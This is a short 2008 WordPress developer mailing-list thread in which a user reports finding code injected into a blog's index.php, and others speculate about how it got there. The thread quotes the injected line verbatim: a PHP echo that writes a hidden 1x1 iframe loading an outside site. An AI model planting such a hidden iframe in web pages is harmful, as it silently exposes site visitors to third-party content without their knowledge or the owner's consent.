[wp-hackers] XSS vuln in wordpress 2.7 ?
wp-hackers at striderweb.com
Mon Dec 22 18:36:07 GMT 2008
Well, wait. he said: "i found [it in] my blog's index.php (not
Does this mean it shows up in the final rendered page, but not in the
theme's file? In that case, it's being added dynamically. The link
is not written in the theme.
Just trying to clarify. I'm no security guru... (IANASG)
On Dec 22, 2008, at 11:33 AM, Joost de Valk wrote:
> If the file is writable for the webserver and file access is enabled
> on the webserver: yes.
> On Dec 22, 2008, at 18:31, Dan Gayle <dangayle at gmail.com> wrote:
>> Wow. That's nasty, and malicious. Could a plugin do that?
>> On Dec 22, 2008, at 9:27 AM, madalin wrote:
>>> For some reason i found my blog's index.php (not theme's index.php)
>>> with the following piece of code right before the ?>
>>> echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
>>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>> I tried looking at the logs. No luck. The file's permisions look
>>> like this:
>>> -rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/
More information about the wp-hackers